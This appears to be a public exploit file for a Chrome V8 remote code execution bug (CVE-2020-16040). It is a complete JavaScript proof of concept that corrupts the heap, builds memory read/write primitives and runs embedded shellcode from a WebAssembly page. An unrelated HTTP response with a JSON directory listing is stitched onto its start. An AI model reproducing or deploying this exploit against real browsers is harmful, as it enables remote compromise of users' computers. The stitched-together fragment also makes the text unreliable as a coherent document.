POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "C:\\Users\\Public\\AccountPictures", "is_hide": true, "is_floder": true, "name": "AccountPictures", "name_display": "AccountPictures", "file_size": 0, "create_time": 1615677, "update_time": 1615737, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Desktop", "is_hide": true, "is_floder": true, "name": "Desktop", "name_display": "Desktop", "file_size": 0, "create_time": 1575713, "update_time": 1617276, "sys_type": 2 }, { "path": "C:\\Users\\Public\\desktop.ini", "is_hide": true, "is_floder": false, "name": "desktop.ini", "name_display": "desktop", "file_size": 174, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Documents", "is_hide": false, "is_floder": true, "name": "Documents", "name_display": "Documents", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Downloads", "is_hide": false, "is_floder": true, "name": "Downloads", "name_display": "Downloads", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Libraries", "is_hide": true, "is_floder": true, "name": "Libraries", "name_display": "Libraries", "file_size": 0, "create_time": 1575713, "update_time": 1575714, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Music", "is_hide": false, "is_floder": true, "name": "Music", "name_display": "Music", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Pictures", "is_hide": false, "is_floder": true, "name": "Pictures", "name_display": "Pictures", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Videos", "is_hide": false, "is_floder": true, "name": "Videos", "name_display": "Videos", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }] } }

# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution # Exploit Author: r4j0x00 # Version: < 87.0.4280.88 # Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. # CVE: CVE-2020-16040 /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ // Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/ var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } function foo(a) { var y = 0x7fffffff; if (a == NaN) y = NaN; if (a) y = -1; let z = y + 1; z >>= 31; z = 0x80000000 - Math.sign(z|1); if(a) z = 0; var arr = new Array(0-Math.sign(z)); arr.shift(); var cor = [1.1, 1.2, 1.3]; return [arr, cor]; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x[0]; var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; function addrof(k) { arr[idx+1] = k; return ftoi(cor[0]) & 0xffffffffn; } function fakeobj(k) { cor[0] = itof(k); return arr[idx+1]; } var float_array_map = ftoi(cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); return (fake[0]); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); fake[0] = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, shellcode[i], true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157]; /*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode copy_shellcode(rwx_page_addr, shellcode); f();